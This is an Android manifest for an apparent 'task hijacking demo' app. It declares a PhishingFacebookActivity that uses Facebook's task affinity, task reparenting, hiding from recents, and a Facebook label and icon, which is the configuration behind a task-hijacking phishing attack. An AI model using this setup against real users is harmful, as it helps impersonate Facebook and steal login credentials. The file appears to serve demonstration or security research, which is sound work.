<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.minhhnn.forsaken.androidtaskhijackingdemo">

    <uses-permission android:name="android.permission.INTERNET" />

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher"
        android:supportsRtl="true"
        android:theme="@style/Theme.AndroidTaskHijackingDemo">

        <activity android:name=".SplashScreenActivity"
                android:theme="@style/SplashscreenTheme">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>

        <activity
            android:name=".PhishingFacebookActivity"
            android:theme="@style/FacebookTheme"
            android:allowTaskReparenting="true"
            android:excludeFromRecents="true"
            android:taskAffinity="com.facebook.katana"
            android:label="Facebook"
            android:icon="@drawable/phishing_fb_icon_1"/>
        <activity android:name=".MainActivity"/>

    </application>

</manifest>